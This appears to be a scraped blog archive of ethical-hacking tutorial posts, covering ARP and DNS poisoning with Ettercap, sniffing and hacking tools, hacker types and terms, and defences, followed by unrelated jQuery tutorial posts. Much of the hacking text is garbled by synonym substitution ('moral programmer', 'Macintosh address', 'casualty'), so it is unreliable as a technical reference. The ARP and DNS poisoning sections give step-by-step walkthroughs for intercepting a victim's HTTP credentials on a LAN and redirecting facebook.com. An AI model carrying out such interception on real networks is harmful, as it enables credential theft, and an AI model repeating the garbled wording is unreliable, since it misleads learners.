DNS Poisoning is a procedure that traps a DNS server into trusting that it has gotten bona fide data when, actually, it has not. It brings about the substitution of false IP address at the DNS level where web addresses are changed over into numeric IP addresses. It enables an aggressor to substitute IP address sections for an objective site on a given DNS server with IP address of the server controls. An aggressor can make fake DNS sections for the server which may contain noxious substance with a similar name.

For example, a client sorts www.google.com, yet the client is sent to another extortion site as opposed to being coordinated to Google's servers. As we comprehend, DNS poisoning is utilized to divert the clients to fake pages which are overseen by the aggressors.

DNS Poisoning − Exercise

We should do an activity on DNS poisoning utilizing a similar device, Ettercap.

DNS Poisoning is very like ARP Poisoning. To start DNS poisoning, you need to begin with ARP poisoning, which we have just talked about in the past part. We will utilize DNS parody module which is as of now there in Ettercap.

Step 1 − Open up the terminal and sort "nano etter.dns". This record contains all sections for DNS tends to which is utilized by Ettercap to determine the space name addresses. In this record, we will include a fake section of "Facebook". On the off chance that somebody needs to open Facebook, he will be diverted to another site.

Terminal

Step 2 − Now embed the passages under the words "Divert it to www.linux.org". See the accompanying illustration −

Divert

Step 3 − Now spare this document and exit by sparing the record. Utilize "ctrl+x" to spare the record.

Step 4 − After this, the entire procedure is same to begin ARP poisoning. In the wake of beginning ARP poisoning, tap on "modules" in the menu bar and select "dns_spoof" module.

Modules

Step 5 − Subsequent to activating the DNS_spoof, you will find in the outcomes that facebook.com will begin mock to Google IP at whatever point somebody writes it in his program.

Activating

It implies the client gets the Google page rather than facebook.com on their program.

In this activity, we perceived how arrange movement can be sniffed through various apparatuses and techniques. Here an organization needs a moral programmer to give arrange security to stop every one of these assaults. We should perceive what a moral programmer can do to forestall DNS Poisoning.

Guards against DNS Poisoning

As a moral programmer, your work could likely set you in a place of counteractive action as opposed to pen testing. What you know as an aggressor can enable you to keep the very methods you utilize all things considered.

Here are guards against the assaults we simply secured from a pen analyzer's viewpoint −

Utilize an equipment exchanged system for the most delicate bits of your system with an end goal to detach activity to a solitary section or impact area.

Execute IP DHCP Snooping on changes to forestall ARP poisoning and ridiculing assaults.

Actualize arrangements to avert wanton mode on organize connectors.

Be watchful while conveying remote get to focuses, realizing that all movement on the remote system is liable to sniffing.

Encode your touchy activity utilizing a scrambling convention, for example, SSH or IPsec.

Port security is utilized by switches that can be customized to permit just particular Macintosh delivers to send and get information on each port.

IPv6 has security advantages and alternatives that IPv4 does not have.

Supplanting conventions, for example, FTP and Telnet with SSH is a successful guard against sniffing. In the event that SSH is not a suitable arrangement, consider securing more seasoned heritage conventions with IPsec.

Virtual Private Systems (VPNs) can give a powerful resistance against sniffing because of their encryption viewpoint.

SSL is an incredible barrier alongside IPsec.

Outline

In this section, we examined how aggressors can catch and break down all the movement by putting a parcel sniffer in a system. With a constant case, we perceived that it is so natural to get the qualifications of a casualty from a given system. Assailants utilize Macintosh assaults, ARP and DNS poisoning assaults to sniff the system movement and get hold of touchy data, for example, email discussions and passwords.

Arp poisoning attack

2017-08-01T00:59:00.000+05:30

Address Determination Convention (ARP) is a stateless convention utilized for resolving IP delivers to machine Macintosh addresses. All system gadgets that need to convey on the system communicate ARP inquiries in the framework to find out other machines' Macintosh addresses. ARP Poisoning is otherwise called ARP Spoofing.

Here is the means by which ARP works −

When one machine needs to speak with another, it looks into its ARP table.

On the off chance that the Macintosh address is not found in the table, the ARP_request is communicated over the system.

All machines on the system will contrast this IP address with Macintosh address.

On the off chance that one of the machines in the system distinguishes this address, then it will react to the ARP_request with its IP and Macintosh address.

The requesting PC will store the address combine in its ARP table and correspondence will happen.

What is ARP Spoofing?

ARP parcels can be produced to send information to the attacker's machine.

ARP spoofing develops a substantial number of manufactured ARP ask for and answer parcels to over-burden the switch.

The switch is set in forwarding mode and after the ARP table is overwhelmed with ridiculed ARP reactions, the attackers can sniff all system bundles.

Attackers surge an objective PC ARP reserve with fashioned passages, which is otherwise called poisoning. ARP poisoning utilizes Man-in-the-Middle access to harm the system.

What is MITM?

The Man-in-the-Middle attack (abridged MITM, MitM, MIM, MiM, MITMA) suggests a dynamic attack where the enemy mimics the client by creating an association between the casualties and sends messages between them. For this situation, the casualties think that they are communicating with each other, however actually, the malevolent performer controls the correspondence.

Third Individual

A third individual exists to control and screen the activity of correspondence between two gatherings. A few conventions, for example, SSL serve to keep this kind of attack.

ARP Poisoning − Exercise

In this activity, we have utilized BetterCAP to perform ARP poisoning in LAN condition using VMware workstation in which we have installed Kali Linux and Ettercap instrument to sniff the nearby movement in LAN.

For this activity, you would require the following instruments −

VMware workstation

Kali Linux or Linux Operating framework

Ettercap Instrument

LAN association

Note − This attack is conceivable in wired and remote systems. You can play out this attack in neighborhood LAN.

Step 1 − Install the VMware workstation and install the Kali Linux operating framework.

Step 2 − Login into the Kali Linux using username pass "root, toor".

Step 3 − Ensure you are associated with neighborhood LAN and check the IP address by typing the command ifconfig in the terminal.

Ifconfig

Step 4 − Open up the terminal and sort "Ettercap –G" to begin the graphical variant of Ettercap.

Ettercap

Step 5 − Now tap the tab "sniff" in the menu bar and select "bound together sniffing" and snap alright to choose the interface. We are going to utilize "eth0" which implies Ethernet association.

Ettercap Input

Step 6 − Now tap the "hosts" tab in the menu bar and snap "examine for has". It will begin scanning the entire system for the alive hosts.

Step 7 − Next, tap the "hosts" tab and select "hosts list" to see the quantity of hosts accessible in the system. This rundown likewise includes the default door address. We must be watchful when we select the objectives.

Host Tab

Step 8 − Now we need to pick the objectives. In MITM, our objective is the host machine, and the course will be the switch deliver to forward the activity. In a MITM attack, the attacker intercepts the system and sniffs the parcels. Along these lines, we will include the casualty as "target 1" and the switch address as "target 2."

In VMware condition, the default passage will dependably end with "2" since "1" is alloted to the physical machine.

Step 9 − In this situation, our objective is "192.168.121.129" and the switch is "192.168.121.2". So we will include target 1 as casualty IP and target 2 as switch IP.

Target

Step 10 − Now tap on "MITM" and snap "ARP poisoning". Thereafter, check the alternative "Sniff remote associations" and snap alright.

Mitm Attack

Step 11 − Snap "begin" and select "begin sniffing". This will begin ARP poisoning in the system which implies we have empowered our system card in "unbridled mode" and now the nearby activity can be sniffed.

Note − We have permitted just HTTP sniffing with Ettercap, so don't anticipate that HTTPS bundles will be sniffed with this procedure.

Step 12 − Now it's a great opportunity to see the outcomes; if our casualty signed into a few sites. You can see the outcomes in the toolbar of Ettercap.

Result

This is the means by which sniffing works. You more likely than not saw that it is so natural to get the HTTP certifications just by enabling ARP poisoning.

ARP Poisoning can possibly cause immense misfortunes in organization situations. This is where moral programmers are appointed to secure the systems.

Like ARP poisoning, there are other attacks, for example, Macintosh flooding, Macintosh spoofing, DNS poisoning, ICMP poisoning, and so on that can make huge misfortune a system.

In the following part, we will examine another sort of attack known as DNS poisoning.

Sniffing tools

2017-08-01T00:58:00.000+05:30

There are such a large number of apparatuses accessible to perform sniffing over a system, and they all have their own particular elements to enable a programmer to investigate movement and analyze the data. Sniffing apparatuses are to a great degree normal applications. We have recorded here a portion of the intriguing ones −

BetterCAP − BetterCAP is a capable, adaptable and versatile apparatus made to perform different sorts of MITM assaults against a system, control HTTP, HTTPS and TCP movement continuously, sniff for certifications, and significantly more.

Ettercap − Ettercap is an exhaustive suite for man-in-the-center assaults. It highlights sniffing of live associations, content separating on the fly and numerous other intriguing traps. It bolsters dynamic and detached dismemberment of numerous conventions and incorporates many elements for system and host examination.

Wireshark − It is a standout amongst the most generally known and utilized parcel sniffers. It offers countless intended to aid the dismemberment and examination of movement.

Tcpdump − It is an outstanding charge line parcel analyzer. It gives the capacity to block and watch TCP/IP and different parcels amid transmission over the system. Accessible at www.tcpdump.org.

WinDump − A Windows port of the prevalent Linux parcel sniffer tcpdump, which is a charge line instrument that is ideal for showing header data.

OmniPeek − Made by WildPackets, OmniPeek is a business item that is the advancement of the item EtherPeek.

Dsniff − A suite of apparatuses intended to perform sniffing with various conventions with the plan of capturing and uncovering passwords. Dsniff is intended for Unix and Linux stages and does not have a full equal on the Windows stage.

EtherApe − It is a Linux/Unix device intended to show graphically a framework's approaching and active associations.

MSN Sniffer − It is a sniffing utility particularly intended for sniffing movement produced by the MSN Delegate application.

NetWitness NextGen − It incorporates an equipment based sniffer, alongside different elements, intended to screen and break down all movement on a system. This device is utilized by the FBI and other law requirement organizations.

A potential programmer can utilize any of these sniffing apparatuses to break down movement on a system and dismember data.

Types of Hacker

2017-08-01T00:57:00.003+05:30

Programmers can be grouped into various classes, for example, white cap, dark cap, and dim cap, in view of their aim of hacking a framework. These distinctive terms originate from old Spaghetti Westerns, where the terrible person wears a dark cattle rustler cap and the great person wears a white cap.

White Hat Hackers

White Hat programmers are otherwise called Ethical Hackers. They never goal to hurt a framework, rather they attempt to discover shortcomings in a PC or a system framework as a piece of infiltration testing and defenselessness evaluations.

Moral hacking is not illicit and it is one of the requesting occupations accessible in the IT business. There are various organizations that contract moral programmers for infiltration testing and helplessness appraisals.

Dark Hat Hackers

Dark Hat programmers, otherwise called saltines, are the individuals who hack with a specific end goal to increase unapproved access to a framework and damage its operations or take touchy data.

Dark Hat hacking is constantly unlawful as a result of its terrible purpose which incorporates taking corporate information, abusing security, harming the framework, blocking system correspondence, and so forth.

Grey Hat Hackers

Grey cap programmers are a mix of both dark cap and white cap programmers. They act without vindictive purpose yet for their fun, they misuse a security shortcoming in a PC framework or system without the proprietor's consent or learning.

Their aim is to convey the shortcoming to the consideration of the proprietors and getting thankfulness or a little abundance from the proprietors.

Different Hackers

Aside from the above surely understood classes of programmers, we have the accompanying classifications of programmers in view of what they hack and how they do it −

Red Hat Hackers

Red cap programmers are again a mix of both dark cap and white cap programmers. They are more often than not on the level of hacking government organizations, top-mystery data center points, and for the most part anything that falls under the classification of touchy data.

Blue Hat Hackers

A blue cap programmer is somebody outside PC security counseling firms who is utilized to bug-test a framework preceding its dispatch. They search for escape clauses that can be misused and attempt to close these crevices. Microsoft additionally utilizes the term BlueHat to speak to a progression of security instructions occasions.

World class Hackers

This is a societal position among programmers, which is utilized to portray the most gifted. Newfound endeavors will flow among these programmers.

Content Kiddie

A content kiddie is a non-master who breaks into PC frameworks by utilizing pre-bundled computerized instruments composed by others, as a rule with small comprehension of the fundamental idea, henceforth the term Kiddie.

Beginner

A beginner, "n00b", or "amateur" or "Green Hat Hacker" is somebody who is new to hacking or phreaking and has no learning or experience of the workings of innovation and hacking.

Hacktivist

A hacktivist is a programmer who uses innovation to declare a social, ideological, religious, or political message. When all is said in done, most hacktivism includes site mutilation or denialof-benefit assaults.

Terms used in hacking

2017-08-01T00:56:00.000+05:30

Following is a rundown of vital terms utilized as a part of the field of hacking.

Adware − Adware is programming intended to constrain pre-picked advertisements to show on your framework.

Assault − An assault is an activity that is done on a framework to get its get to and separate touchy information.

Indirect access − A secondary passage, or trap entryway, is a shrouded section to a registering gadget or programming that detours safety efforts, for example, logins and secret word assurances.

Bot − A bot is a program that mechanizes an activity so it should be possible more than once at a considerably higher rate for a more maintained period than a human administrator could do it. For instance, sending HTTP, FTP or Telnet at a higher rate or calling content to make objects at a higher rate.

Botnet − A botnet, otherwise called zombie armed force, is a gathering of PCs controlled without their proprietors' information. Botnets are utilized to send spam or make disavowal of administration assaults.

Animal constrain assault − A savage drive assault is a mechanized and the easiest sort of technique to access a framework or site. It tries distinctive mix of usernames and passwords, again and again, until the point that it gets in.

Cradle Overflow − Buffer Overflow is an imperfection that happens when more information is composed to a piece of memory, or support, than the cushion is apportioned to hold.

Clone phishing − Clone phishing is the adjustment of a current, true blue email with a false connect to trap the beneficiary into giving individual data.

Saltine − A wafer is one who changes the product to get to the elements which are viewed as undesirable by the individual splitting the product, particularly duplicate insurance highlights.

Dissent of administration assault (DoS) − A foreswearing of administration (DoS) assault is a pernicious endeavor to make a server or a system asset inaccessible to clients, for the most part by briefly hindering or suspending the administrations of a host associated with the Internet.

DDoS − Distributed disavowal of administration assault.

Endeavor Kit − An adventure pack is programming framework intended to keep running on web servers, with the reason for distinguishing programming vulnerabilities in customer machines speaking with it and abusing found vulnerabilities to transfer and execute pernicious code on the customer.

Endeavor − Exploit is a bit of programming, a piece of information, or a succession of summons that exploits a bug or powerlessness to trade off the security of a PC or system framework.

Firewall − A firewall is a channel intended to keep undesirable gatecrashers outside a PC framework or system while permitting safe correspondence amongst frameworks and clients within the firewall.

Keystroke logging − Keystroke logging is the way toward following the keys which are pushed on a PC (and which touchscreen focuses are utilized). It is basically the guide of a PC/human interface. It is utilized by dim and dark cap programmers to record login IDs and passwords. Keyloggers are typically emitted onto a gadget utilizing a Trojan conveyed by a phishing email.

Rationale bomb − An infection discharged into a framework that triggers a malevolent activity when certain conditions are met. The most widely recognized adaptation is the time bomb.

Malware − Malware is an umbrella term used to allude to an assortment of types of threatening or nosy programming, including PC infections, worms, Trojan steeds, ransomware, spyware, adware, scareware, and different malignant projects.

Ace Program − An ace program is the program a dark cap programmer uses to remotely transmit charges to contaminated zombie rambles, ordinarily to do Denial of Service assaults or spam assaults.

Phishing − Phishing is an email extortion strategy in which the culprit conveys true blue looking messages, trying to accumulate individual and budgetary data from beneficiaries.

Phreaker − Phreakers are viewed as the first PC programmers and they are the individuals who break into the phone organize unlawfully, regularly to make free longdistance telephone calls or to tap telephone lines.

Rootkit − Rootkit is a stealthy sort of programming, ordinarily vindictive, intended to shroud the presence of specific procedures or projects from typical techniques for discovery and empower proceeded with favored access to a PC.

Psychologist Wrap code − A Shrink Wrap code assault is a demonstration of misusing gaps in unpatched or ineffectively designed programming.

Social designing − Social building suggests misdirecting somebody with the motivation behind getting touchy and individual data, similar to Visa points of interest or client names and passwords.

Spam − A Spam is basically a spontaneous email, otherwise called garbage email, sent to a substantial number of beneficiaries without their assent.

Ridiculing − Spoofing is a procedure used to increase unapproved access to PCs, whereby the gatecrasher sends messages to a PC with an IP address demonstrating that the message is originating from a put stock in have.

Spyware − Spyware is programming that plans to assemble data about a man or association without their insight and that may send such data to another element without the buyer's assent, or that declares control over a PC without the purchaser's information.

SQL Injection − SQL infusion is a SQL code infusion system, used to assault information driven applications, in which malignant SQL proclamations are embedded into a section field for execution (e.g. to dump the database substance to the assailant).

Risk − A danger is a conceivable threat that can misuse a current bug or defenselessness to trade off the security of a PC or system framework.

Trojan − A Trojan, or Trojan Horse, is a malignant program camouflaged to resemble a legitimate program, making it hard to recognize from programs that should be there planned with an aim to crush documents, modify data, take passwords or other data.

Infection − An infection is a pernicious program or a bit of code which is fit for duplicating itself and normally has an adverse impact, for example, defiling the framework or devastating information.

Defenselessness − A powerlessness is a shortcoming which enables a programmer to trade off the security of a PC or system framework.

Worms − A worm is a self-imitating infection that does not change documents but rather lives in dynamic memory and copies itself.

Cross-website Scripting − Cross-webpage scripting (XSS) is a kind of PC security helplessness regularly found in web applications. XSS empowers aggressors to infuse customer side content into site pages saw by different clients.

Zombie Drone − A Zombie Drone is characterized as a hey jacked PC that is being utilized secretly as a fighter or "automaton" for pernicious movement, for instance, circulating undesirable spam messages.

Hacking tools

2017-08-01T00:54:00.000+05:30

In this section, we will examine to sum things up some of well known instruments that are generally used to avoid hacking and getting unapproved access to a PC or system framework.

NMAP

Nmap remains for System Mapper. It is an open source device that is utilized generally for organize revelation and security reviewing. Nmap was initially intended to check extensive systems, yet it can work similarly well for single hosts. System overseers likewise think that its valuable for errands, for example, arrange stock, overseeing administration redesign calendars, and observing host or administration uptime.

Nmap utilizes crude IP parcels to decide −

what has are accessible on the system,

what benefits those hosts are putting forth,

what working frameworks they are running on,

what kind of firewalls are being used, and other such qualities.

Nmap keeps running on all real PC working frameworks, for example, Windows, Macintosh OS X, and Linux.

Metasploit

Metasploit is a standout amongst the most capable endeavor devices. It's a result of Rapid7 and the vast majority of its assets can be found at: www.metasploit.com. It comes in two forms − business and free version. Matasploit can be utilized with summon provoke or with Web UI.

With Metasploit, you can play out the accompanying operations −

Direct fundamental infiltration tests on little systems

Run spot keeps an eye on the exploitability of vulnerabilities

Find the system or import filter information

Peruse misuse modules and run singular adventures on has

Burp Suit

Burp Suite is a prominent stage that is broadly utilized for performing security testing of web applications. It has different devices that work in joint effort to help the whole testing process, from starting mapping and examination of an application's assault surface, through to finding and misusing security vulnerabilities.

Burp is anything but difficult to utilize and gives the chairmen full control to join propelled manual methods with mechanization for proficient testing. Burp can be effortlessly designed and it contains components to help even the most experienced analyzers with their work.

Angry IP Scanner

Angry IP scanner is a lightweight, cross-stage IP address and port scanner. It can filter IP addresses in any range. It can be unreservedly replicated and utilized anyplace. With a specific end goal to expand the checking speed, it utilizes multithreaded approach, wherein a different examining string is made for each filtered IP address.

Angry IP Scanner just pings every IP deliver to check if it's alive, and afterward, it settle its hostname, decides the Macintosh address, examines ports, and so forth. The measure of accumulated information about each host can be spared to TXT, XML, CSV, or IP-Port rundown records. With help of modules, Angry IP Scanner can accumulate any data about examined IPs.

Cain and Abel

Cain and Abel is a watchword recuperation apparatus for Microsoft Working Frameworks. It helps in simple recuperation of different sorts of passwords by utilizing any of the accompanying techniques −

sniffing the system,

breaking encoded passwords utilizing Lexicon, Savage Compel and Cryptanalysis assaults,

recording VoIP discussions,

interpreting mixed passwords,

recuperating remote system keys,

uncovering secret key boxes,

revealing stored passwords and breaking down steering conventions.

Cain and Abel is a valuable instrument for security advisors, proficient entrance analyzers and every other person who intends to utilize it for moral reasons.

Ettercap

Ettercap remains for Ethernet Catch. It is a system security device for Man-in-the-Center assaults. It highlights sniffing of live associations, content separating on the fly and numerous other fascinating traps. Ettercap has inbuilt components for system and host examination. It underpins dynamic and inactive dismemberment of numerous conventions.

You can run Ettercap on all the mainstream working frameworks, for example, Windows, Linux, and Macintosh OS X.

EtherPeek

EtherPeek is a great instrument that improves organize examination in a multiprotocol heterogeneous system condition. EtherPeek is a little instrument (under 2 MB) that can be effectively introduced in a matter of couple of minutes.

EtherPeek proactively sniffs movement bundles on a system. Naturally, EtherPeek bolsters conventions, for example, AppleTalk, IP, IP Address Determination Convention (ARP), NetWare, TCP, UDP, NetBEUI, and NBT bundles.

SuperScan

SuperScan is an intense apparatus for arrange executives to examine TCP ports and resolve hostnames. It has an easy to understand interface that you can use to −

Perform ping sweeps and port outputs utilizing any IP extend.

Output any port range from an implicit rundown or any given range.

View reactions from associated has.

Change the port rundown and port descriptions utilizing the implicit supervisor.

Union port records to fabricate new ones.

Interface with any found open port.

Dole out a custom assistant application to any port.

QualysGuard

QualysGuard is a coordinated suite of devices that can be used to streamline security operations and lower the cost of consistence. It conveys basic security insight on request and robotizes the full range of evaluating, consistence and assurance for IT frameworks and web applications.

QualysGuard incorporates an arrangement of devices that can screen, distinguish, and secure your worldwide system.

WebInspect

WebInspect is a web application security evaluation apparatus that distinguishes known and obscure vulnerabilities inside the Internet application layer.

It can likewise help watch that an Internet server is arranged appropriately, and endeavors normal web assaults, for example, parameter infusion, cross-website scripting, index traversal, and that's only the tip of the iceberg.

LC4

LC4 was once known as L0phtCrack. It is a secret key evaluating and recuperation application. It is utilized to test secret key quality and once in a while to recuperate lost Microsoft Windows passwords, by utilizing word reference, beast compel, and half and half assaults.

LC4 recoups Windows client account passwords to streamline movement of clients to another confirmation framework or to get to accounts whose passwords are lost.

LANguard System Security Scanner

LANguard System Scanner screens a system by checking associated machines and giving data about every hub. You can acquire data about every individual working framework.

It can likewise distinguish registry issues and have a report set up in HTML organize. For every PC, you can list the netbios name table, current signed on client, and Macintosh address.

System Stumbler

System stumbler is a WiFi scanner and observing instrument for Windows. It permits arrange experts to distinguish WLANs. It is generally utilized by systems administration fans and programmers since it encourages you find non-broadcasting remote systems.

System Stumbler can be utilized to check if a system is all around arranged, its flag quality or scope, and distinguish impedance between at least one remote systems. It can likewise be utilized to non-approved associations.

ToneLoc

ToneLoc remains for Tone Locator. It was a prominent war dialing PC program composed for MS-DOS in the mid 90's. War dialing is a strategy of utilizing a modem to consequently check a rundown of phone numbers, as a rule dialing each number in a neighborhood.

Malignant programmers utilize the subsequent records in breaking PC security - for speculating client records, or finding modems that may give a passage point into PC or other electronic frameworks.

It can be utilized by security faculty to identify unapproved gadgets on an organization's phone arrange.

Hacker's skills

2017-08-01T00:53:00.002+05:30

As an ethical hacker, you should understand various hacking procedures, for example, −

Password speculating and cracking
Session hijacking
Session mocking
System traffic sniffing
Denial of Administration attacks
Abusing support flood vulnerabilities
SQL infusion

In this chapter, we will talk about a portion of the skills that you would require to wind up plainly a specialist in Ethical Hacking.

Basic Skills

PC Hacking is a Science as well as an Art. Like any other ability, you have to put a considerable measure of effort with a specific end goal to acquire information and turn into a specialist hacker. When you are on the track, you would require more effort to stay up with the latest with latest advancements, new vulnerabilities and exploitation systems.

An ethical hacker must be a PC frameworks master and needs extremely solid programming and PC organizing skills.

An ethical hacker needs a great deal of patience, steadiness, and perseverance to attempt again and again and wait for the required outcome.

Additionally, an ethical hacker ought to be sufficiently smart to understand the situation and other clients' outlook keeping in mind the end goal to apply social building misuses. A good ethical hacker has great critical thinking skills as well.

Courses and Certifications

This tutorial gives the basic rules to wind up plainly a fruitful Ethical Hacker. In the event that you want to exceed expectations in this field, at that point you may seek after the accompanying courses and certifications −

Obtain a bachelor's degree in Software engineering or A+ Certificate to gain an understanding of the most well-known hardware and software advances.

Get into a programmer's part for a couple of years and then change to get a technical support position.

Continue to get arrange certifications like Network+ or CCNA and then security certifications like Security+, CISSP, or TICSA.

It is suggested that you get some work involvement as a System Specialist and Framework Administrator to understand systems and frameworks back to front.

Continue going through various books, tutorials and papers to understand various PC security aspects and take them as a challenge to secure your system and PC frameworks as system security design.

Study courses which cover creating Trojan steeds, backdoors, infections, and worms, denial of administration (DoS) attacks, SQL infusion, cradle flood, session hijacking, and framework hacking.

Master the art of penetration testing, footprinting and reconnaissance, and social building.

Finally go for a Certified Ethical Hacker (CEH) Certification.

GIAC (Global Information Assurance Certification) and Hostile Security Certified Professional (OSCP) are additional IT security certifications which will add a considerable measure of value to your profile.

Final Note

You have to stay as a White Hat Hacker which means you have to work inside given boundaries. Never barge in or attack any PC or system without a required authorization from the authorities.

As a final note, it is very prescribed that you refrain from engaging yourself in black hat hacking which may ruin your whole career.

Technology Used in JQuery:

2017-07-28T14:02:00.000+05:30

Technology Used in JQuery:

jQuery is a client-side library built on top of JavaScript , the jquery uses many others technology to produce a effective product, these are of the following types.

1. HTML

2. C.S.S

3. JAVASCRIPT

When you can use JQuery?

JQuery is much more powerful expressive, easy to use and less doing of code, it is basically a small library that gives you powerful control over the Document Object Model, with a very little effort or work on your part.

It can be used to anybody who wants to:

• Quick access to AJAX

• Without access to AJAX

• And some basic animation effects to spice things up

Features & Facts of JQuery

2017-07-28T14:01:00.000+05:30

Features & Facts of JQuery:

With its great features query can be used in JSP, SERVLET, ASP, PHP, CGI and almost all the web programming languages.

Here we short out the list of the features of JQuery.

• Ajax

• DOM element selections functions using the cross browser open source selector engine.

• Effects and animations

• DOM traversal and modification

• Events

• JavaScript Plugins

• CSS manipulation

• Extensibility

• Utilities - such as browser version and the each function.

• The $ function• One of the critical concepts in any jQuery code is the so called ‘$’ function. ‘$’ is actually an ‘alias’ for the ‘jQuery’ namespace.

Facts about JQuery:

• The size of the jquery is about 19 kb in size.

• It supports CSS 1-3 and also the basic XPath.

• We can use the prototype and jquery together, without any problem.

• JQuery owns a strong and very flexible mechanism for adding in methods and functionality, bunduled as plugging.

• It supports in Firefox 1.0+, IE5.5 and Safari 1.3 and Opera 8.5.

Example Explaining the working of Jquery:

2017-07-28T13:59:00.000+05:30

Example Explaining the working of Jquery:

JQuery is, as we explained is a very easy client side script used on web application, it is basically a best use of JAVASCRIPT (X)HTML and the CSS, with a suitably use of these the result produces will be more effective expressive and dynamic as compare to normal JavaScript .

The jquery is simply produces the base result of as like JavaScript but of better looks and visibility.

Let’s take an example:

To filling a simple form (As a registration form, login form or etc.) use of JavaScript in many fields are ment be necessary, JavaScript gives with an alert with a window base pattern, when a users fills a wrong entry, the window will appears with an alert message, when we cut (X) or close the window, it disappears, normally JavaScript is having a same way to a client side validation but it’s a very old fashioned and do not looks good for all application, it seems to be a old fashioned warinig concept, but while on useing jquery(/Ajax) it will applies the filter with a different pattern of alert messages, which give a fresh look to your web site, there are many types of way to display the alert in the JQuery which makes jquery more impressive, powerful and strong and which increases page’s beauty more.

Like the alert comes below each field as a statement (with proper using of css and use of image. Comes a different type of window with increasing slowly and on close, it close with different style.

There are many more examples, some of them are explain here, but before that you can understand the basic thinks of the jquery, We can teach you each an every thing with explanation, and at the last give you the whole example of jquery with the explanation, demonstration and code, in other section, so that you can learn and apply that in your script

Module 2:GETTING STARTED WITH JQUER

2017-07-28T13:58:00.000+05:30

GETTING STARTED WITH JQUERY:

The first article of the jquery begins here by exploring the syntax of jquery, how it is set up, and how its functions are called. Later than we explain the core functions in the library and how it uses its powerful selectors and filters to make DOM traversal easy and straightforward. This tutorial is basically for that who have the prior knowledge about basics JavaScript s, css syntax and the DOM syntax.

Before getting the fun with jquery, we need to get the basics, out of the way- how to install it and how to start and so on.

Functions:

Before we explain about jquery, I want to explain the selectors, attributes and functions used in the jquery.

Selectors

The term “Selectors” are used in jQuery, it serves some of the best features to jQuery, when it comes to dom manipulation. They allow you to quickly select all elements or groups of elements of a given tag name, attribute name or their contents and allow you to manipulate them as a group or a single node.

Example of jQuery selectors

Some of the main Selector which is frequently used in jquery is listed below:

1. #id – This selector is most commonly used selector which matches a simgle element with the given id attribute.

Example:

$("div").css("border"," 5px solid green");

2. element- This selector is also commonly used, This selector will collect all elements in a document with the given tag name i.e. table, ul, li, a etc.

Example:

$("div").css("border"," 5px solid green");

Note:* It differs from the ‘id ‘attribute (above one) only for it select all the div with the given name in the script.

3. class- The class selector will mathes all elements in the document with the given class name.

Example:

$(".myClass").css("border","3px solid red");

4. class- Matches all the element with the given classes.

Example

$(".myClass").css("border","5px solid green");

5. selector1, selector2, and selectorN- This selector is for the matches of combined result of the specified selector.

Example:

$("div,span,p.myClass").css("border","3px solid red");

Here we describe about the basic terms used in the jQuery –

1- :hidden – It is used for matching all of the elements which are hidden.

Example:

$("span:first").text("We here found total of " +
$(":hidden", document.body).length +" hidden elements ");
$("div:hidden").show(3000);
$("span:last").text( $("input:hidden").length + " hidden inputs are found here.");

2-: visible – It is just reverse of the hidden it matches all of the elements which are visible.

Example:

$("div:visible").click(function () {
$(this).css("background", "yellow");
});
$("button").click(function () {
$("div:hidden").show("fast");
});

Some of the term is used as a filter/separator, which are commonly used as a filter to separate the term.

1- : First – It matches the element which is to be selected first.

Example:

$("tr:first").css("font-style", "bold");

First Element

Second element

Third Element

2- : Last – It matches the element which is selected last.

Example:

$("tr:last").css({backgroundColor: 'red', fontWeight: 'bolder'});

First Element

Second element

Third Element

3- : Not (selector) – It filters out the all the element matching the given selector.;

Example:

$("input:not(:checked) + span").css("background-color", "orange");
$("input").attr("disabled", "disabled");

4- : Even – It matches the even no of elements.

Example:

$("tr:even").css("background-color", "996699");

5- : Odd – It matches the odd no of elements.

Example:

$("tr:odd").css("background-color", "#996699");

6- : Header -It matches all the element that are headers, like h1, h2, h3 and so on.

Example:

$(":header").css({ background:'#CAB', color:'green' });

Attribute filters-

• [attribute]- Matches elements that have the specific attribute.

Example:

$("div[id]").one("click", function(){
var strId = $(this).text() + " = " + $(this).attr("id");
$(this).text(strId);

});

• [attribute=value]- Matches elements that have the specific attribute with a certain value. A little more definition and tone comes in through this selector. We can use the < a> element again. For example, use$('[href=http://www.xyz.com]') to select all < a> elements with a link to foxnews, the only reputable news source in America (of course).

Example:

$("div[id]").one("click", function(){
var strId = $(this).text() + " = " + $(this).attr("id");
$(this).text(strId);
})

• [attribute!=value] - Matches elements that either don’t have the specific attribute or do have the specific attribute but not having a certain value. There are many of the filter are there expect them, which will be known by you on practicing more example.

Example:

$("input[name=attrName]").next().text(" a text ");

Now after a short view on the elements used in jquery let us we describe the basic term used form:

Inputs- it matches all the inputs, text area, select and button elements etc. It Returns only input Elements of the tag name input, select, text area and button.

Example:

var totalinput = $(":input");
var formChild= $("form > *");
$("#messages").text("Found " + totalinput.length + " inputs are called, form has " +
formChild.length + " children.");
;

: Text – it matches all the inputs of the text type.

Example:

var txtInput = $("form input:text").
css({background:"red", border:"5px
yellow solid"});
$("div").text("For this type jQuery found " + txtInput.length + ".")
.css("color", "green");

: Password – matches all the input element of typed password.

Example:

var inputPass = $("input:password").
css({background:"red", border:"5px red solid"});
$("div").text("A Password Field is found " + inputPass.length + ".")
.css("color", "green");

Some more Selectors-

: Enable- It is used in a script to display all the inputs that are enable.

Example:

$("input:enabled").val("enable field");

: Disable- It is used in a script to display all the inputs that are disable.

Example:

$("input:disabled").val("disable field");

Like these all the others element have the same meaning with respect to its name.

Module 3:Example and explanations

2017-07-28T13:57:00.001+05:30

Example and explanations:

Before we move to the example, there are some points which you must be known; there are some terms that should be known by you that can help you to understand the jQuery with ease.

What is ready() function-

This is the main function used in the jQquery, it is the heart of the jQuery, if you want to run any event the event (function) must be placed inside this function. This code is to load your functions if you do not add this code your jquery will be useless.

Basically this function work as- Any function which you want to be fire (process) on the web page it (event) must be present in that [$(document). ready ()] function. Through this $(document).ready () function you can fire/move your event as you want

The working of the function is start as soon as the DOM is loaded and before the page contents are loaded.

Syntax-

$(document).ready(function() {
//all of your code goes here
});

About the function : As you can see the function, it have a little bit confusing, may it makes little bit hard you to understand.

$ function- One of the critical concepts in any jQuery code is the so called ‘$’ function. ‘$’ is actually an ‘alias’ for the ‘jQuery’ namespace.

$(document) - Activate jquery for object

*Note: some points must be taken in mind before using the above function.

function(){

}

Resides in the ready(), so syntax will be little bit confusing at the last step-

}); - The curly brases for the inner function (function()) closed before the round bracket which is close for the ready function.

Frequently used in script

$(document):- This option will apply the jQuery library methods to a DOM object (in this case, the document object).

$(’#mydiv’):- This option will select every < div> that has the < id> attribute set to “mydiv”.

$(’p.first’):- This option will select all of the < p> tags with the class of “first”.

